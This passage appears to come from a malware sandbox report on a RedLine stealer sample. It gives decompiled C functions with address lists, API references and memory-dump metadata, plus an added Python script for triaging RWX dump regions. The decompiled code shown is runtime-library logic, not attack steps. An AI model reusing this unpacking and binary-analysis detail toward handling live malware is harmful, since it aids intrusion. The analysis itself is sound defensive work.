                                                                                                                                                                                          • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                                          • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

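Every function fingerprint above is tied to the same three memory dumps, and the dump file names carry the region metadata a triager wants: the region base (the report confirms the fourth field as "Offset: 00400000"), the page protection and the memory type. The following decoder is an added example and is not part of the Joe Sandbox report. The Windows constants (PAGE_EXECUTE_READWRITE = 0x40, MEM_PRIVATE = 0x20000 and the rest) are the winnt.h values; the meaning of the first three fields (process index, dump index, sequence id) is an assumption about the naming convention, and the helper names (DumpRegion, parse_sdmp_name, triage) are this example's own. It also handles protection modifier bits such as PAGE_GUARD, which the report's dumps happen not to use.

```python
# Added example (not part of the Joe Sandbox report): decode the .sdmp
# memory-dump names cited above. The base-address field is confirmed by the
# report ("Offset: 00400000"); the meaning of the process, dump and sequence
# fields is an assumption about the naming convention. Protection and
# memory-type values are the Windows winnt.h constants.
import re
from dataclasses import dataclass
from typing import List, Optional

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <proc>.<dump>.<seq>.<base>.<protect>.<type>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    proc_index: int
    dump_index: int
    sequence: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Low byte is the base protection; higher bits are modifier flags.
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE/WRITECOPY and their EXECUTE forms


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split an .sdmp file name into fields; raise ValueError for anything else."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(int(m["proc"], 16), int(m["dump"], 16), int(m["seq"]),
                      int(m["base"], 16), int(m["protect"], 16), int(m["mtype"], 16))


def triage(names: List[str], image_base: Optional[int] = None) -> List[str]:
    """One finding per dump. A writable+executable private region at the image
    base is the footprint of a PE that was unpacked over itself."""
    findings = []
    for name in names:
        r = parse_sdmp_name(name)
        flags = []
        if r.executable and r.writable:
            flags.append("RWX")
        if r.mem_type == 0x20000:
            flags.append("private")
        if image_base is not None and r.base == image_base:
            flags.append("at image base")
        findings.append(f"{r.base:#010x} {r.protect_name} {r.mem_type_name}: "
                        + (", ".join(flags) or "nothing notable"))
    return findings


# The three dump names cited in the report above.
REPORT_DUMPS = [
    "00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp",
    "00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp",
    "00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp",
]

if __name__ == "__main__":
    for line in triage(REPORT_DUMPS, image_base=0x400000):
        print(line)
```

Run against the report's three dumps, the decoder reports all of them as RWX private memory, with the first sitting at 0x00400000; a legitimately loaded image would instead show MEM_IMAGE with read-only or execute-read sections. That combination is what the "overwrites its own PE header" unpacking signature in the summary rests on, and it is the region to carve when rebuilding the unpacked RedLine payload.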
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                          				intOrPtr _t112;
                                                                                                                                                                                          				intOrPtr _t113;
                                                                                                                                                                                          				short* _t115;
                                                                                                                                                                                          				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x4c5fa4f
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                          									L52:
                                                                                                                                                                                          									E004147AE(_v16);
                                                                                                                                                                                          									_t116 = _v12;
                                                                                                                                                                                          									goto L84;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t184 = LCMapStringW;
                                                                                                                                                                                          								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                          								_v12 = _t174;
                                                                                                                                                                                          								if(_t174 == 0) {
                                                                                                                                                                                          									goto L52;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                          									__eflags = _t174;
                                                                                                                                                                                          									if(_t174 <= 0) {
                                                                                                                                                                                          										L44:
                                                                                                                                                                                          										_t184 = 0;
                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                          										L45:
                                                                                                                                                                                          										__eflags = _t184;
                                                                                                                                                                                          										if(_t184 != 0) {
                                                                                                                                                                                          											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                          											__eflags = _t141;
                                                                                                                                                                                          											if(_t141 != 0) {
                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                          												__eflags = _a24;
                                                                                                                                                                                          												if(_a24 != 0) {
                                                                                                                                                                                          													_push(_a24);
                                                                                                                                                                                          													_push(_a20);
                                                                                                                                                                                          												} else {
                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                          											}
                                                                                                                                                                                          											E004147AE(_t184);
                                                                                                                                                                                          										}
                                                                                                                                                                                          										goto L52;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t144 = 0xffffffe0;
                                                                                                                                                                                          									_t179 = _t144 % _t174;
                                                                                                                                                                                          									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                          									if(_t144 / _t174 < 2) {
                                                                                                                                                                                          										goto L44;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                          									_t146 = _t174 + _t52;
                                                                                                                                                                                          									__eflags = _t146 - 0x400;
                                                                                                                                                                                          									if(_t146 > 0x400) {
                                                                                                                                                                                          										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                          										__eflags = _t147;
                                                                                                                                                                                          										if(_t147 != 0) {
                                                                                                                                                                                          											 *_t147 = 0xdddd;
                                                                                                                                                                                          											_t147 =  &(_t147[4]);
                                                                                                                                                                                          											__eflags = _t147;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_t184 = _t147;
                                                                                                                                                                                          										goto L45;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									E0040CFB0(_t146);
                                                                                                                                                                                          									_t184 = _t189;
                                                                                                                                                                                          									__eflags = _t184;
                                                                                                                                                                                          									if(_t184 == 0) {
                                                                                                                                                                                          										goto L52;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									 *_t184 = 0xcccc;
                                                                                                                                                                                          									_t184 =  &(_t184[4]);
                                                                                                                                                                                          									goto L45;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                          									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                          								}
                                                                                                                                                                                          								goto L52;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t150 = 0xffffffe0;
                                                                                                                                                                                          							_t179 = _t150 % _t182;
                                                                                                                                                                                          							if(_t150 / _t182 < 2) {
                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                          							_t152 = _t182 + _t25;
                                                                                                                                                                                          							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                          								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                          								__eflags = _t153;
                                                                                                                                                                                          								if(_t153 == 0) {
                                                                                                                                                                                          									L27:
                                                                                                                                                                                          									_v16 = _t153;
                                                                                                                                                                                          									goto L29;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								 *_t153 = 0xdddd;
                                                                                                                                                                                          								L26:
                                                                                                                                                                                          								_t153 =  &(_t153[4]);
                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							E0040CFB0(_t152);
                                                                                                                                                                                          							_t153 = _t189;
                                                                                                                                                                                          							if(_t153 == 0) {
                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							 *_t153 = 0xcccc;
                                                                                                                                                                                          							goto L26;
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t178 = _a16;
                                                                                                                                                                                          				_t157 = _a12;
                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                          					_t178 = _t178 - 1;
                                                                                                                                                                                          					if( *_t157 == 0) {
                                                                                                                                                                                          						break;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t157 =  &(_t157[1]);
                                                                                                                                                                                          					if(_t178 != 0) {
                                                                                                                                                                                          						continue;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                          					break;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                          				if(_t160 < _a16) {
                                                                                                                                                                                          					_t160 = _t160 + 1;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_a16 = _t160;
                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                          			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
                                                                                                                                                                                          0x004172d8
                                                                                                                                                                                          0x004172d8
                                                                                                                                                                                          0x004172de
                                                                                                                                                                                          0x004172e4
                                                                                                                                                                                          0x004172e7
                                                                                                                                                                                          0x004172ea
                                                                                                                                                                                          0x004172f3
                                                                                                                                                                                          0x004172f6
                                                                                                                                                                                          0x004173ef
                                                                                                                                                                                          0x004173f1
                                                                                                                                                                                          0x004173f1
                                                                                                                                                                                          0x004173f4
                                                                                                                                                                                          0x004173f6
                                                                                                                                                                                          0x004173f9
                                                                                                                                                                                          0x004173fe
                                                                                                                                                                                          0x004173ff
                                                                                                                                                                                          0x00417402
                                                                                                                                                                                          0x00417404
                                                                                                                                                                                          0x00417406
                                                                                                                                                                                          0x00417409
                                                                                                                                                                                          0x0041740b
                                                                                                                                                                                          0x0041740c
                                                                                                                                                                                          0x00417411
                                                                                                                                                                                          0x00417409
                                                                                                                                                                                          0x00417412
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417412
                                                                                                                                                                                          0x00417309
                                                                                                                                                                                          0x0041730e
                                                                                                                                                                                          0x00417311
                                                                                                                                                                                          0x00417314
                                                                                                                                                                                          0x00417316
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041732a
                                                                                                                                                                                          0x0041732c
                                                                                                                                                                                          0x0041732f
                                                                                                                                                                                          0x00417331
                                                                                                                                                                                          0x0041733a
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x0041737b
                                                                                                                                                                                          0x0041737b
                                                                                                                                                                                          0x0041737d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417384
                                                                                                                                                                                          0x0041739c
                                                                                                                                                                                          0x0041739e
                                                                                                                                                                                          0x004173a1
                                                                                                                                                                                          0x004173a3
                                                                                                                                                                                          0x004173bf
                                                                                                                                                                                          0x004173c1
                                                                                                                                                                                          0x004173c9
                                                                                                                                                                                          0x004173cb
                                                                                                                                                                                          0x004173cb
                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                          0x004173cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004173d4
                                                                                                                                                                                          0x0041733c
                                                                                                                                                                                          0x0041733f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417341
                                                                                                                                                                                          0x00417344
                                                                                                                                                                                          0x00417349
                                                                                                                                                                                          0x00417362
                                                                                                                                                                                          0x00417368
                                                                                                                                                                                          0x0041736a
                                                                                                                                                                                          0x0041736c
                                                                                                                                                                                          0x00417372
                                                                                                                                                                                          0x00417372
                                                                                                                                                                                          0x00417372
                                                                                                                                                                                          0x00417375
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417375
                                                                                                                                                                                          0x0041734b
                                                                                                                                                                                          0x00417350
                                                                                                                                                                                          0x00417352
                                                                                                                                                                                          0x00417354
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417356
                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                          0x00417333
                                                                                                                                                                                          0x00417333
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00417117
                                                                                                                                                                                          0x0041711a
                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                          0x00417414
                                                                                                                                                                                          0x00417425
                                                                                                                                                                                          0x00417425
                                                                                                                                                                                          0x00417120
                                                                                                                                                                                          0x00417126
                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                          0x00417130
                                                                                                                                                                                          0x00417153
                                                                                                                                                                                          0x00417155
                                                                                                                                                                                          0x00417157
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                          0x004171a5
                                                                                                                                                                                          0x004171a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004171c1
                                                                                                                                                                                          0x004172aa
                                                                                                                                                                                          0x004172ad
                                                                                                                                                                                          0x004172b2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004172b5
                                                                                                                                                                                          0x004171c7
                                                                                                                                                                                          0x004171db
                                                                                                                                                                                          0x004171dd
                                                                                                                                                                                          0x004171e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004171ef
                                                                                                                                                                                          0x0041721a
                                                                                                                                                                                          0x0041721c
                                                                                                                                                                                          0x00417263
                                                                                                                                                                                          0x00417263
                                                                                                                                                                                          0x00417263
                                                                                                                                                                                          0x00417265
                                                                                                                                                                                          0x00417265
                                                                                                                                                                                          0x00417267

APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,03191888), ref: 004170C5
• MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
• _malloc.LIBCMT ref: 0041718A
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• _malloc.LIBCMT ref: 0041724C
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• __freea.LIBCMT ref: 004172A4
• __freea.LIBCMT ref: 004172AD
• ___ansicp.LIBCMT ref: 004172DE
• ___convertcp.LIBCMT ref: 00417309
• LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
• _malloc.LIBCMT ref: 00417362
• _memset.LIBCMT ref: 00417384
• LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
• ___convertcp.LIBCMT ref: 004173BA
• __freea.LIBCMT ref: 004173CF
• LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp

Similarity
• API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
• String ID:
• API String ID: 3809854901-0
• Opcode ID: 933ff2d5b42dd3f3d5c005204d55fe4baca965455adffe6b3e253dbb5065971c
• Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
• Opcode Fuzzy Hash: 933ff2d5b42dd3f3d5c005204d55fe4baca965455adffe6b3e253dbb5065971c
• Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                          				char* _t60;
                                                                                                                                                                                          				char _t62;
                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                          				char _t64;
                                                                                                                                                                                          				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
